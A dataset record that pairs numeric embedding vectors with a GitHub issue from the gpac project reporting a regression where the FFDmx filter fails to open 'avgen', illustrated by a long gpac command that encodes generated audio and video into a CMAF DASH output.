0.01532543171197176, -0.0025542385410517454, -0.009411439299583435, 0.006822777446359396, -0.019208425655961037, 0.027717962861061096, 0.012543996796011925, 0.005559427663683891, -0.022513100877404213, 0.01882287859916687, 0.0016291015781462193, -0.016275525093078613, -0.015972597524523735, 0.0017779840854927897, 0.02719472348690033, -0.0032582031562924385, -0.00881935190409422, 0.017377084121108055, 0.010223839432001114, -0.003471630159765482, 0.027125876396894455, 0.0020413254387676716, -0.004716047085821629, -0.00010294837557012215, 0.022017398849129677, 0.011008699424564838, -0.0060895527713000774, 0.007593868300318718, -0.009349477477371693, -0.010327110067009926, -0.013239354826509953, -0.013060351833701134, -0.0051876516081392765, 0.012130912393331528, -0.021852165460586548, -0.007862373255193233, -0.009838293306529522, 0.010664462111890316, -0.00014006142737343907, -0.011738481931388378, 0.010265147313475609, -0.0028864273335784674, -0.009425208903849125, -0.010953621938824654, 0.01008614432066679, 0.0017108579631894827, -0.010120567865669727, -0.006526733748614788, -0.0015757449436932802, 0.01801048032939434, 0.017060386016964912, -0.00915670394897461, 0.006764257326722145, -0.013218700885772705, 0.0038348003290593624, 0.000856289523653686, 0.020943379029631615, -0.006908836774528027, -0.004636872559785843, -0.0013786691706627607, 0.006977683864533901, 0.007483712397515774, 0.002688491018489003, 0.008543962612748146, -0.0031893558334559202, -0.007614522706717253, -0.020805684849619865, 0.014168795198202133, 0.0029225721955299377, 0.007490597199648619, -0.0020533737260848284, -0.007834834046661854, -0.001123933820053935, -0.005253056529909372, -0.0026575096417218447, -0.001553369453176856, -0.022031167522072792, 0.001742699882015586, 0.01120835728943348, -0.0103959571570158, -0.0019208424491807818, -0.0077384477481245995, 0.00729782460257411, -0.016950229182839394, -0.009955334477126598, 0.003769395174458623, -0.03458893299102783, -0.0037246444262564182, -0.0019707567989826202, 0.016454529017210007, -0.002815858693793416, -0.012399417348206043, 0.00016964429232757539, 0.00827545765787363, 0.020048363134264946, 0.009831408970057964, 0.0091704735532403, -0.005101592279970646, -0.0016927854157984257, 0.013631785288453102, -0.022637024521827698, -0.032798901200294495, -0.008908853866159916, 0.02463359944522381, -0.014857268892228603, -0.000014616625776397996, -0.012640383094549179, 0.0018020807765424252, 0.013198046945035458, 0.02343565598130226, -0.009755676612257957, 0.0008085266454145312, 0.029852233827114105, 0.012289261445403099, -0.02349073253571987, -0.002538747852668166, 0.01281250175088644, -0.01186929177492857, 0.00306543055921793, 0.005886452738195658, -0.015766054391860962, -0.0003001316508743912, -0.0015662783989682794, 0.0291086807847023, 0.003580064745619893, 0.0035525260027498007, 0.0030757575295865536, 0.021108612418174744, -0.018327178433537483, 0.0276766549795866, 0.011215241625905037, -0.024082820862531662, -0.016303064301609993, -0.00880558229982853, -0.010258262977004051, 0.01084346603602171, 0.030127622187137604, 0.0005266825901344419, -0.01154570933431387, 0.004061996471136808, -0.005270268768072128, 0.013232470490038395, -0.01854749023914337, 0.008722965605556965, 0.004771125037223101, -0.004626545123755932, -0.003790049348026514, 0.008165301755070686, -0.0028847060166299343, 0.0035421987995505333, -0.013266894035041332, -0.014843499287962914, 0.016275525093078613, 0.0033063965383917093, 0.010602499358355999, -0.005876125767827034, -0.00811710860580206, -0.010864119976758957, 0.038058843463659286, 0.0014578436966985464, 0.014788421802222729, 0.003418273525312543, -0.024234285578131676, 0.007032761815935373, 0.004623102955520153, 0.014994964003562927, -0.04048227146267891, -0.020585373044013977, 0.00025710201589390635, -0.011414899490773678, -0.009108510799705982, 0.006375269498676062, -0.0036730088759213686, -0.006778026465326548, 0.0025594020262360573, 0.014010446146130562, -0.01076084841042757, 0.007779756095260382, 0.019070729613304138, -0.00646821316331625, -0.00011661028838716447, 0.02638232335448265, -0.01078838761895895, 0.0029415052849799395, 0.02773173339664936, 0.024069052189588547, -0.009473402053117752, -0.0016007020603865385, 0.007614522706717253, -0.016330603510141373, -0.008908853866159916, 0.008888198994100094, -0.0016161927487701178, 0.005342558491975069, -0.009673059917986393, 0.0051979785785079, 0.002864051843062043, -0.004839972127228975, 0.0026299706660211086, -0.016247985884547234, -0.016454529017210007, -0.008158417418599129, 0.007834834046661854, -0.014457954093813896, 0.020833224058151245, 0.01366620883345604, 0.017652474343776703, 0.018354717642068863, 0.011814214289188385, -0.005094707477837801, 0.021948551759123802, 0.01725315861403942, -0.0035456412006169558, 0.0027125875931233168, -0.01828587055206299, 0.015215275809168816, 0.008488884195685387, 0.023105187341570854, 0.0069053941406309605, 0.01011368352919817, 0.00009509547089692205, -0.006079225335270166, 0.0179278627038002, -0.012695460580289364, 0.007428634446114302, 0.014375337399542332, 0.0017289303941652179, 0.01292265672236681, 0.0015129216481000185, 0.000702673802152276, -0.03657174110412598, 0.0015989808598533273, -0.001689343131147325, -0.03166980296373367, 0.005910549312829971, -0.017239389941096306, -0.021149922162294388, -0.013025928288698196, 0.018616337329149246, -0.02219640277326107, 0.010919197462499142, 0.026189550757408142, -0.007456173654645681, 0.002611037576571107, -0.014912347309291363, 0.015352969989180565, -0.004850299563258886, 0.0021824627183377743, 0.0006768560269847512, 0.002287454903125763, -0.018561258912086487, -0.0019879688043147326, -0.009886486455798149, 0.012902002781629562, 0.009852062910795212, -0.011766021139919758, 0.004289193078875542, -0.007063743192702532, -0.0001615762448636815, 0.0023941684048622847, 0.004781452007591724, 0.02163185365498066, 0.0019208424491807818, -0.0031721440609544516, 0.006709179375320673, -0.0020000170916318893, 0.007855487987399101, 0.017101693898439407, 0.0023666294291615486, 0.011077546514570713, 0.012743653729557991, -0.00015393848298117518, -0.012523341923952103, -0.009996642358601093, -0.004499177448451519, 0.003512938739731908, 0.01297773513942957, -0.018382256850600243, 0.009294399060308933, -0.0019105153623968363, -0.012826270423829556, -0.002497439505532384, 0.004371809773147106, 0.01814817450940609, 0.003404503921046853, 0.02927391417324543, -0.00973502267152071, -0.015380509197711945, -0.011173932813107967, 0.01671614870429039, 0.0033614742569625378, -0.004420002922415733, -0.021260077133774757, -0.009858948178589344, 0.0070912824012339115, -0.009046548046171665, 0.026134474202990532, 0.009012124501168728, 0.017748860642313957, 0.013397703878581524, 0.009039663709700108, -0.008254803717136383, 0.022678334265947342, 0.006774584297090769, -0.0009853783994913101, 0.06928802281618118, -0.013631785288453102, -0.006578369066119194, -0.0020464889239519835, 0.005390751641243696, -0.007814180105924606, 0.010974275879561901, 0.0013958810595795512, -0.0003255191259086132, -0.00004647199602914043, -0.03304675221443176, 0.005903664510697126, -0.023559581488370895, 0.01147686131298542, 0.009404554963111877, 0.03334968164563179, 0.008206610567867756, 0.0016626646975055337, -0.008137762546539307, -0.014802191406488419, 0.005986281670629978, -0.00030249825795181096, -0.012661037035286427, -0.009652405977249146, -0.009838293306529522, -0.01385209709405899, -0.005924318917095661, -0.022031167522072792, -0.006822777446359396, 0.009136050008237362, -0.011132624931633472, 0.01927727274596691, -0.0044854083098471165, -0.018561258912086487, 0.003461303189396858, -0.016055213287472725, -0.014210104010999203, 0.012564650736749172, 0.001147169852629304, 0.0001610383769730106, 0.005383866839110851, 0.018726492300629616, 0.016275525093078613, 0.01974543370306492, 0.00364202749915421, 0.007146360352635384, 0.0071532451547682285, -0.01042349636554718, 0.007889912463724613, -0.010712655261158943, -0.01292265672236681, -0.012578420341014862, -0.010244493372738361, 0.02373858354985714, -0.005652371793985367, 0.007855487987399101, 0.02460606023669243, -0.007593868300318718, -0.0029742077458649874, -0.0015482059679925442, 0.002965601859614253, 0.013273779302835464, -0.010643808171153069, 0.005831374786794186, 0.0007650667685084045, -0.008874430321156979, -0.002321878680959344, -0.026905564591288567, 0.012564650736749172, 0.019993284717202187, 0.0028072528075426817, -0.0011196308769285679, -0.014430414885282516, -0.0029225721955299377, -0.002898475620895624, -0.0009225551621057093, -0.009012124501168728, 0.003048218786716461, 0.0023666294291615486, 0.009163589216768742, 0.009487171657383442, -0.018726492300629616, 0.0001928802957991138, -0.011098201386630535, 0.001821013749577105, -0.010278916917741299, 0.006991453468799591, 0.027745502069592476, 0.04976290091872215, 0.021315155550837517, 0.025184379890561104, -0.018299639225006104, 0.005631717387586832, -0.003803818952292204, -0.007428634446114302, -0.021907243877649307, -0.012227298691868782, -0.0103959571570158, -0.0034010615199804306, -0.007745332550257444, 0.015587051399052143, 0.021108612418174744, 0.0038692238740622997, -0.017239389941096306, -0.006812450475990772, -0.003910532221198082, -0.013576707802712917, 0.010389072820544243, -0.0017444209661334753, -0.008020722307264805, 0.02068175934255123, -0.015215275809168816, 0.00865411851555109, 0.0012883070157840848, -0.02146662026643753, 0.013390819542109966, 0.0021962320897728205, -0.0005675607826560736, -0.02786942757666111, -0.004172152373939753, 0.01617913879454136, 0.0059071071445941925, -0.024908989667892456, -0.005514676682651043, -0.005542215891182423, 0.011848637834191322, -0.010781503282487392, -0.019786743447184563, 0.006382153835147619, -0.010382188484072685, -0.003759068204089999, -0.0017710993997752666, 0.01963527873158455, 0.011173932813107967, 0.013156738132238388, -0.008344304747879505, 0.012399417348206043, -0.012530227191746235, 0.004963897634297609, 0.012564650736749172, -0.0019397755386307836, -0.0052564991638064384, 0.019401198253035545, -0.014086178503930569, -0.0209296103566885, 0.024619830772280693, 0.004788336809724569, 0.00027990771923214197, 0.015945058315992355, 0.01005860511213541, -0.0039036476518958807, -0.009253090247511864, 0.026506248861551285, -0.006113649345934391, 0.010230723768472672, 0.016564683988690376, -0.0103959571570158, 0.0048984927125275135, 0.00448196567595005, -0.0022461465559899807, 0.004134286195039749, -0.002043046522885561, -0.015779824927449226, 0.0020413254387676716, -0.0029208508785814047, -0.003444091184064746, -0.015614590607583523, -0.0358557254076004, 0.0158486720174551, 0.013920944184064865, 0.009590443223714828, 0.004189364146441221, -0.0209296103566885, 0.004358040634542704, 0.005704007111489773, 0.0034234370104968548, 0.006523291114717722, 0.017170540988445282, 0.002118778647854924, 0.0055491006933152676, -0.005817605182528496, 0.010320225730538368, -0.011648979969322681, 0.014251411892473698, -0.009673059917986393, -0.01460941880941391, -0.01292265672236681, 0.001317567192018032, 0.009989758022129536, 0.010051720775663853, -0.003872666275128722, 0.0003100284666288644, 0.015779824927449226, 0.032936595380306244, -0.024716217070817947, 0.006654101423919201, 0.0322481207549572, 0.0003797364479396492, 0.00025602628011256456, -0.016757456585764885, -0.0069157215766608715, -0.004578351974487305, 0.014251411892473698, 0.01609652303159237, 0.003363195573911071, -0.014692035503685474, -0.013425243087112904, 0.014926116913557053, 0.0038829934783279896, 0.010705770924687386, 0.01082969643175602, -0.004771125037223101, 0.015270353294909, 0.0124063016846776, 0.026024317368865013, -0.013459666632115841, -0.004134286195039749, -0.008495769463479519, 0.0026213647797703743, 0.004420002922415733, -0.013211816549301147, -0.008481999859213829, 0.045108817517757416, 0.002905360423028469, 0.0066781979985535145, 0.004877838306128979, 0.0051979785785079, -0.024096589535474777, 0.014967424795031548, -0.00476079760119319, -0.01579359360039234, 0.017115464434027672, 0.0012125748908147216, -0.010988045483827591, 0.0020137864630669355, 0.0007543093524873257, 0.0024991605896502733, -0.008344304747879505, -0.00006777165981475264, 0.034313544631004333, -0.004010361153632402, 0.00592776108533144, 0.011655865237116814, -0.004822760354727507, 0.010884773917496204, 0.003485399764031172, -0.017597395926713943, -0.011821098625659943, 0.02932899259030819, 0.017693782225251198, 0.030155161395668983, 0.005559427663683891, 0.02247179113328457, -0.007876142859458923, 0.023215344175696373, -0.006010378245264292, 0.009425208903849125, -0.00315321097150445, 0.0019449390238150954, 0.015435587614774704, -0.00844069104641676, -0.013452782295644283, -0.007986298762261868, -0.01668860949575901, -0.02902606502175331, -0.011414899490773678, -0.005982839036732912, -0.0029724864289164543, 0.03855454549193382, -0.013067237101495266, 0.0010430380934849381, -0.038196537643671036, 0.018189484253525734, 0.008550846949219704, -0.019318580627441406, 0.00789679680019617, -0.002984534716233611, 0.005972512066364288, 0.005566312465816736, -0.014265181496739388, 0.0015447635669261217, 0.007752217352390289, -0.011724712327122688, 0.018519951030611992, 0.027401264756917953, -0.0008653257973492146, 0.013604246079921722, 0.009142935276031494, -0.0019191212486475706, -0.0335424542427063, -0.011986332945525646, 0.014857268892228603, 0.004499177448451519, 0.00009498789586359635, -0.005628275219351053, -0.011318512260913849, -0.00861280970275402, -0.018864188343286514, -0.0045370436273515224, -0.007538790348917246, -0.013191161677241325, -0.015738515183329582, -0.005996608640998602, -0.02176954783499241, -0.0062651135958731174, 0.0009251369629055262, 0.00150689750444144, -0.0020688644144684076, -0.030981330201029778, -0.0035094963386654854, -0.00029453777824528515, 0.014086178503930569, 0.011008699424564838, 0.007290939800441265, -0.012764307670295238, -0.011724712327122688, -0.02168693207204342, -0.012454494833946228, 0.0053115771152079105, 0.028186125680804253, -0.01722561940550804, 0.023917587473988533, -0.014871038496494293, -0.011593902483582497, 0.008716081269085407, 0.01454057078808546, 0.018189484253525734, -0.010292686522006989, 0.007077512796968222, -0.01116704847663641, -0.0009750513127073646, -0.006809007842093706, 0.008592155762016773, -0.01969035714864731, 0.025638772174715996, -0.006475097965449095, 0.01898811385035515, 0.017170540988445282, 0.019263502210378647, 0.020998457446694374, -0.0045404862612485886, 0.014265181496739388, 0.004812433384358883, -0.004564582835882902, 0.0009397670510224998, -0.009087856858968735, -0.01313608419150114, 0.010588730685412884, 0.004454426933079958, -0.024509673938155174, 0.013198046945035458, -0.003411388723179698, 0.008846891112625599, 0.02384874038398266, -0.028805753216147423, 0.01387963630259037, -0.022210171446204185, 0.0013416637666523457, 0.0002053588832495734, 0.013872751034796238, -0.011752251535654068, -0.010285801254212856, 0.002390726003795862, -0.017101693898439407, 0.0013864145148545504, -0.003113623708486557, -0.002783156232908368, -0.01154570933431387, -0.006058571394532919, 0.019869359210133553, 0.0031600957736372948, 0.0024475250393152237, -0.031256720423698425, -0.02000705525279045, 0.010389072820544243, -0.006337403319776058, -0.00585202919319272, -0.01004483550786972, 0.017404623329639435, 0.00503618735820055, -0.0037831647787243128, 0.019112039357423782, 0.020502755418419838, -0.009631751105189323, 0.0018158501479774714, -0.02382120117545128, -0.005101592279970646, 0.004778009839355946, -0.007070627994835377, 0.016674840822815895, 0.016027674078941345, -0.0021686931140720844, 0.005115361884236336, -0.0016815977869555354, 0.015972597524523735, 0.010712655261158943, 0.005542215891182423, 0.00939767062664032, -0.017886554822325706, 0.0029191297944635153, 0.0032100100070238113, -0.0018433891236782074, 0.04326370730996132, -0.008543962612748146, 0.013005274347960949, -0.013439012691378593, 0.004041342530399561, 0.002127384766936302, -0.016344372183084488, -0.012667921371757984, -0.008323650807142258, 0.010120567865669727, -0.014141255989670753, -0.0005043072160333395, -0.011821098625659943, -0.031366877257823944, -0.029686998575925827, 0.013280663639307022, 0.012984619475901127, 0.008165301755070686, -0.017969172447919846, -0.028254972770810127, 0.0018933034734800458, -0.010306456126272678, 0.004891607910394669, -0.011387360282242298, -0.010189414955675602, -0.015862440690398216, 0.0017814264865592122, 0.01452680118381977, 0.00048322268412448466, 0.006065456196665764, 0.026162011548876762, 0.0031927982345223427, 0.012537111528217793, 0.011710942722856998, -0.0067849112674593925, 0.01719808019697666, 0.008605925366282463, 0.02362842857837677, 0.007518136408179998, 0.005297807510942221, -0.009418324567377567, 0.01593128778040409, -0.006340845488011837, 0.00737355649471283, 0.01755608804523945, -0.018451103940606117, 0.0013692027423530817, 0.001041316892951727, 0.003889878047630191, -0.025556154549121857, 0.003559410572052002, 0.006013820413500071, -0.022692102938890457, 0.004798663780093193, -0.0034905632492154837, 0.014389107003808022, 0.008123992942273617, -0.023614658042788506, -0.009473402053117752, -0.0014432136667892337, 0.005325346253812313, -0.005383866839110851, 0.00976256188005209, 0.004884723108261824, -0.024344440549612045, -0.009886486455798149, -0.012075833976268768, 0.024234285578131676, 0.017170540988445282, 0.007228977046906948, -0.010726424865424633, -0.012633497826755047, -0.010120567865669727, -0.0011463091941550374, 0.0016299622366204858, -0.018272100016474724, -0.0051256888546049595, -0.00881935190409422, -0.011876177042722702, -0.02643740177154541, 0.029714537784457207, -0.004082650877535343, 0.023958895355463028, 0.00935636181384325, 0.0069157215766608715, -0.015105119906365871, -0.001333918422460556, -0.004323616623878479, 0.006361499894410372, 0.01803801953792572, 0.0030774788465350866, 0.0048296451568603516, -0.007655831053853035, -0.009473402053117752, -0.014967424795031548, -0.018726492300629616, 0.0041170744225382805, -0.009865832515060902, 0.004051669500768185, 0.020888300612568855, 0.016619762405753136, 0.027263570576906204, 0.00522551778703928, 0.004533601459115744, -0.009273745119571686, 0.006475097965449095, 0.0003530580725055188, -0.0016161927487701178, -0.017005307599902153, 0.004499177448451519, -0.0036730088759213686, 0.013735056854784489, 0.008853775449097157, -0.0054871379397809505, 0.00027151693939231336, -0.010809041559696198, -0.014375337399542332, 0.02295372262597084, 0.017542317509651184, 0.00556286983191967, -0.015008733607828617, -0.02357335016131401, 0.009755676612257957, 0.004282308276742697, 0.0019501026254147291, 0.006771141663193703, -0.016509607434272766, 0.01149063091725111, 0.0129364263266325, -0.005724661517888308, 0.012282376177608967, -0.002483669901266694, 0.007531905546784401, 0.015160197392106056, -0.013914059847593307, 0.022967493161559105, -0.006234132219105959, 0.004034457728266716, 0.011862407438457012, 0.02214132435619831, -0.01885041780769825, 0.039711181074380875, -0.015766054391860962, -0.0015112004475668073, -0.005428617354482412, 0.03778345510363579, -0.009700599126517773, -0.003996591549366713, -0.016055213287472725, -0.02570761926472187, 0.014051754958927631, 0.019456274807453156, 0.02303634025156498, 0.011339167132973671, -0.02084699273109436, -0.010919197462499142, 0.007669600658118725, 0.002741847652941942, 0.008571501821279526, -0.00493635842576623, -0.018354717642068863, 0.01679876632988453, -0.004957012832164764, -0.00506372656673193, 0.012991504743695259, 0.007903682067990303, -0.0032702514436095953, -0.02039260044693947, 0.0013382213655859232, 0.020998457446694374, -0.0013976022601127625, 0.00003157298851874657, 0.007883027195930481, -0.00903277937322855, 0.012185989879071712, 0.0146231884136796, 0.009438978508114815, -0.02143908105790615, -0.002005180576816201, -0.010795272886753082, 0.0070912824012339115, 0.01787278614938259, 0.010781503282487392, -0.021976090967655182, 0.04307093471288681, -0.02084699273109436, -0.024688677862286568, -0.003079199930652976, -0.004678180906921625, -0.00010160370584344491, -0.007580098696053028, 0.017514778301119804, 0.0013898569159209728, -0.0038141459226608276, -0.008041376248002052, 0.009728137403726578, 0.006681640166789293, 0.005105034913867712, 0.01890549622476101, 0.020516525954008102, 0.017294466495513916, 0.015063811093568802, 0.019208425655961037, 0.018409794196486473 ]
105
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
```gpac -i avgen:dur=30:sr=48000:ch=2:#ClampDur=9.6:#PStart=0.0:#m=m1 @ ffenc:c=aac @1 ffenc:c=avc:fintra=1.920 @ @1 reframer:xs=0.0:FID=P0 -i avgen:dur=30:sr=48000:ch=2:#ClampDur=9.6:#PStart=9.6:#m=m2:#BUrl=batch3/counter/b/ @ ffenc:c=aac @1 ffenc:c=avc:fintra=1.920 @ @1 reframer:xs=9.6:FID=P1 -i avgen:dur=30:sr=48000:ch=2:#ClampDur=9.6:#PStart=19.2:#m=m3 @ ffenc:c=aac @1 ffenc:c=avc:fintra=1.920 @ @1 reframer:xs=19.2:FID=P2 -o batch3/counter/b/dash.mpd:segdur=1.920:stl:cmaf=cmf2:SID=P0,P1,P2 --template='$m$_$Type$_$Number$'```
regression: [FFDmx] Fail to open avgen - error No such file or directory
https://api.github.com/repos/gpac/gpac/issues/1798/comments
3
2021-05-24T12:13:21
2021-05-25T08:28:53Z
https://github.com/gpac/gpac/issues/1798
899,604,928
1,798
false
This is a GitHub Issue repo:gpac owner:gpac Title : regression: [FFDmx] Fail to open avgen - error No such file or directory Issue date: --- start body --- ```gpac -i avgen:dur=30:sr=48000:ch=2:#ClampDur=9.6:#PStart=0.0:#m=m1 @ ffenc:c=aac @1 ffenc:c=avc:fintra=1.920 @ @1 reframer:xs=0.0:FID=P0 -i avgen:dur=30:sr=48000:ch=2:#ClampDur=9.6:#PStart=9.6:#m=m2:#BUrl=batch3/counter/b/ @ ffenc:c=aac @1 ffenc:c=avc:fintra=1.920 @ @1 reframer:xs=9.6:FID=P1 -i avgen:dur=30:sr=48000:ch=2:#ClampDur=9.6:#PStart=19.2:#m=m3 @ ffenc:c=aac @1 ffenc:c=avc:fintra=1.920 @ @1 reframer:xs=19.2:FID=P2 -o batch3/counter/b/dash.mpd:segdur=1.920:stl:cmaf=cmf2:SID=P0,P1,P2 --template='$m$_$Type$_$Number$'``` --- end body ---
709
[ -0.037467073649168015, 0.04391920566558838, -0.0180627703666687, 0.004000640474259853, -0.008727943524718285, 0.009223032742738724, -0.014477367512881756, 0.0562804639339447, -0.016154281795024872, 0.012417157180607319, -0.0011818258790299296, 0.001051066443324089, 0.024978049099445343, 0.014445425942540169, -0.008959517814218998, 0.03551865741610527, -0.02949773520231247, 0.00985387247055769, 0.010109402239322662, -0.01766350492835045, 0.015347765758633614, -0.030551796779036522, -0.0027709025889635086, 0.040086254477500916, -0.02256648615002632, 0.0002118602569680661, -0.028970705345273018, 0.024754460901021957, -0.012257451191544533, -0.0004958378267474473, 0.026191817596554756, 0.011091595515608788, -0.032053034752607346, -0.00024816844961605966, 0.05056298151612282, 0.006655755918473005, 0.027724996209144592, 0.06484071910381317, -0.019595950841903687, -0.002183982403948903, -0.03127047419548035, -0.025009991601109505, -0.03909607604146004, 0.01868562586605549, -0.01167452335357666, -0.0011109563056379557, -0.013135834597051144, 0.02494610846042633, -0.027389613911509514, 0.0002096143871312961, 0.02031462825834751, -0.0055178492330014706, -0.03155794367194176, -0.030136559158563614, -0.0056695700623095036, -0.024930138140916824, 0.020713893696665764, 0.02293381094932556, -0.031526003032922745, 0.05899547040462494, 0.002665097126737237, 0.023317106068134308, -0.02630361169576645, 0.042992908507585526, -0.0068474034778773785, -0.004659428261220455, -0.010245152749121189, 0.03580613061785698, -0.017839182168245316, 0.0056815482676029205, 0.01720035821199417, -0.027836790308356285, -0.020426422357559204, 0.017184387892484665, 0.020586129277944565, -0.05292663350701332, 0.022806044667959213, 0.04305679351091385, -0.0118422145023942, 0.0022478648461401463, -0.04720915108919144, 0.0029465793631970882, -0.08809394389390945, 0.0058931587263941765, -0.0014243796467781067, 0.012177597731351852, -0.061997946351766586, -0.07071790844202042, -0.03583807125687599, -0.014221836812794209, 0.01548351626843214, 0.007781684398651123, 0.05206422135233879, -0.015148133039474487, -0.0008569235797040164, 0.007063006516546011, -0.004998804070055485, -0.016609445214271545, -0.013830556534230709, -0.021704072132706642, -0.0429290272295475, -0.025489110499620438, 0.011155477724969387, -0.015148133039474487, 0.021081218495965004, 0.008991459384560585, 0.010356946848332882, 0.002010301686823368, 0.012033862061798573, 0.12961755692958832, -0.007749743293970823, -0.0022857950534671545, 0.012664701789617538, -0.03388965502381325, 0.00577737158164382, 0.028571439906954765, -0.0229018684476614, -0.028858911246061325, 0.00395272858440876, 0.01777530089020729, 0.013223673216998577, -0.021240925416350365, -0.04887009784579277, 0.02622375823557377, -0.013758689165115356, 0.04379143938422203, -0.006823447532951832, -0.013143820688128471, -0.02167213149368763, 0.0041803098283708096, -0.07295379042625427, -0.019532067701220512, 0.025377314537763596, -0.015954649075865746, 0.0363810732960701, -0.043983086943626404, -0.049508921802043915, 0.004136390518397093, -0.0009362776181660593, -0.023460840806365013, -0.03912802040576935, -0.048806216567754745, 0.04276932030916214, -0.013614953495562077, -0.013223673216998577, -0.03420906886458397, 0.00601293845102191, 0.006204586010426283, -0.00576539384201169, 0.044877443462610245, -0.039064135402441025, 0.0013664861908182502, 0.006240519694983959, -0.008424501866102219, 0.012041847221553326, 0.015794944018125534, 0.0006652761367149651, 0.008568237535655499, 0.00021560337336268276, -0.044877443462610245, 0.026974378153681755, -0.004236206877976656, -0.004839098080992699, 0.008117067627608776, -0.010420829989016056, -0.045739855617284775, 0.010540609247982502, 0.0034237017389386892, -0.021688101813197136, 0.02727781981229782, 0.0011299214093014598, 0.012776495888829231, -0.004910965450108051, -0.0031382269226014614, -0.050531040877103806, -0.021624218672513962, 0.03491177409887314, 0.07244273275136948, -0.026974378153681755, 0.007051028776913881, -0.03986266627907753, -0.006140703335404396, 0.003902820171788335, 0.0007022081990726292, 0.02810829132795334, -0.014629088342189789, 0.03535895422101021, -0.04366367682814598, 0.027868732810020447, -0.023173369467258453, 0.029114440083503723, 0.028379792347550392, 0.016785122454166412, -0.0010540608782321215, 0.040693141520023346, -0.010388888418674469, -0.030791355296969414, -0.005933085456490517, -0.012121700681746006, 0.008057177998125553, -0.004216243512928486, -0.05177675187587738, 0.011251301504671574, 0.010117387399077415, -0.038616959005594254, 0.023987870663404465, -0.008272781036794186, 0.04874233156442642, 0.016401827335357666, -0.04679391533136368, -0.019931333139538765, -0.02847561612725258, 0.0023916002828627825, 0.012712613679468632, -0.020091040059924126, 0.010836065746843815, 0.004120420198887587, 0.02397190034389496, -0.01155474316328764, -0.0366366021335125, 0.03657272085547447, -0.022678280249238014, -0.0024455012753605843, 0.024482959881424904, -0.014453411102294922, -0.007294580806046724, 0.0020422430243343115, -0.014844691380858421, -0.024179518222808838, 0.016082413494586945, -0.02167213149368763, 0.006863373797386885, 0.0007216723752208054, -0.009494533762335777, -0.002595225814729929, 0.008831752464175224, -0.0012167616514489055, -0.009207062423229218, 0.005162503104656935, 0.002659108256921172, 0.008743914775550365, 0.02970535308122635, 0.0024634681176394224, -0.009159150533378124, 0.008711973205208778, 0.03064762055873871, 0.0070071094669401646, 0.041523613035678864, 0.00982991699129343, -0.01745588704943657, -0.004679391626268625, -0.022374838590621948, 0.005234370939433575, -0.004503714852035046, -0.03122256137430668, 0.005234370939433575, 0.014030189253389835, 0.012137671001255512, -0.0054260180331766605, -0.03315500542521477, -0.010652403347194195, 0.0056496066972613335, -0.02973729372024536, -0.0019094872986897826, -0.002046235604211688, -0.01945221610367298, -0.008496370166540146, 0.006939234212040901, -0.0054379962384700775, -0.010133358649909496, -0.03309112414717674, -0.017759328708052635, -0.05838858708739281, -0.004236206877976656, -0.0019603935070335865, -0.0366366021335125, 0.0065918732434511185, -0.0028168181888759136, 0.047336917370557785, -0.004743274301290512, -0.033442478626966476, 0.010117387399077415, -0.007562088780105114, -0.008408531546592712, -0.009805960580706596, 0.020506275817751884, 0.0020522247068583965, -0.028459645807743073, -0.03829754516482353, 0.042386025190353394, 0.04104449227452278, 0.03243632987141609, -0.047656331211328506, 0.0154435895383358, -0.003393756691366434, 0.012648731470108032, 0.009702151641249657, -0.022135280072689056, 0.036604661494493484, 0.002728979801759124, -0.025872403755784035, 0.034272950142621994, 0.019899392500519753, -0.026798700913786888, -0.026575110852718353, 0.0008040209067985415, -0.01978759840130806, 0.021065248176455498, 0.017567681148648262, -0.0014133998192846775, 0.03436877578496933, -0.03309112414717674, -0.003427694318816066, 0.006060850340873003, -0.009406695142388344, 0.0012516973074525595, 0.013239644467830658, -0.05005192384123802, -0.024850284680724144, -0.0004451810382306576, 0.0050427233800292015, -0.026143904775381088, -0.058644115924835205, -0.014589161612093449, 0.015267913229763508, -0.01558732520788908, -0.03411324322223663, -0.001068035257048905, -0.05187257379293442, -0.0011179434368386865, 0.024019813165068626, 0.0009492537355981767, 0.02544119767844677, -0.035454776138067245, -0.00020524741557892412, -0.02080971747636795, -0.018286360427737236, -0.01913280226290226, 0.0335063599050045, -0.0005375111941248178, -0.010492697358131409, 0.0151161914691329, -0.008280766196548939, -0.003319892566651106, -0.03724348545074463, -0.0010520645882934332, 0.00989379920065403, 0.014533264562487602, 0.026527199894189835, -0.0042521776631474495, 0.0010311031946912408, 0.0030723479576408863, 0.012624775059521198, -0.02154436707496643, -0.021208982914686203, -0.005757408682256937, 0.00592909287661314, -0.015826884657144547, 0.013359423726797104, 0.010963831096887589, -0.025792552158236504, -0.013854512944817543, 0.01380660105496645, 0.010852036066353321, 0.010652403347194195, -0.030216412618756294, -0.012728583998978138, -0.028044408187270164, -0.02478640154004097, -0.004415876232087612, -0.004216243512928486, 0.019308479502797127, -0.051265690475702286, 0.01327158510684967, -0.016369884833693504, -0.002054220996797085, 0.01312784943729639, 0.01302404049783945, -0.0267028771340847, 0.002972531598061323, -0.06535177677869797, 0.00391280185431242, 0.00854428205639124, -0.03002476505935192, 0.03826560452580452, 0.030056707561016083, -0.017439916729927063, 0.010245152749121189, -0.010476727038621902, -0.02318933978676796, -0.04768827185034752, 0.0004459296469576657, -0.040820904076099396, -0.03363412618637085, -0.03154197335243225, -0.025537021458148956, -0.0006787513266317546, -0.04567597433924675, 0.039479371160268784, -0.007063006516546011, 0.0006927256472408772, -0.002866726368665695, 0.020665982738137245, 0.04567597433924675, -0.023157399147748947, 0.03772260621190071, 0.008312707766890526, -0.03765872120857239, 0.03577418997883797, 0.014708940871059895, 0.011235331185162067, -0.024403108283877373, -0.027181996032595634, -0.02002715691924095, 0.015307839028537273, 0.0283957626670599, -0.015044324100017548, 0.0007970337755978107, -0.053437694907188416, 0.023237252607941628, 0.016785122454166412, 0.0035035547334700823, 0.018366213887929916, 0.0023117472883313894, 0.05247945711016655, 0.021320777013897896, -0.012600819580256939, 0.008408531546592712, 0.004132397938519716, -0.017887094989418983, 0.02462669648230076, -0.011993935331702232, 0.008368604816496372, -0.0052862754091620445, -0.0016379867447540164, -0.00590114388614893, -0.04219437763094902, -0.032835595309734344, 0.00412840535864234, 0.018829360604286194, -0.039479371160268784, 0.017647534608840942, 0.02085763029754162, 0.009941711090505123, 0.0018695606850087643, -0.023955930024385452, -0.04513297230005264, -0.022949781268835068, 0.035614483058452606, -0.02350875362753868, 0.01745588704943657, 0.07122896611690521, 0.005557775963097811, -0.0124970106408, -0.0077178021892905235, 0.022949781268835068, 0.012552907690405846, 0.014429455623030663, 0.05046715959906578, -0.008999444544315338, 0.007845567539334297, 0.011003756895661354, 0.005505871493369341, 